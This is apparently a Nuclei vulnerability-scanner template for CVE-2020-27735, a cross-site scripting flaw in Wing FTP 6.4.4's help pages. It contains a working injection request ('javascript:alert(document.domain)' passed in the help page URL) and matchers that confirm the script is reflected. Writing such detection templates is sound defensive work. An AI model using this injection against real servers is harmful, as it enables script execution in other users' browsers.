nuclei-templates/cves/2020/CVE-2020-27735.yaml

42 lines
1.2 KiB
YAML

id: CVE-2020-27735
info:
name: Wing FTP 6.4.4 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
reference:
- https://www.wftpserver.com/serverhistory.htm
- https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-27735
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-27735
cwe-id: CWE-79
tags: cve,cve2020,xss,wing-ftp
requests:
- method: GET
path:
- "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
words:
- '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html
# Enhanced by mp on 2022/08/14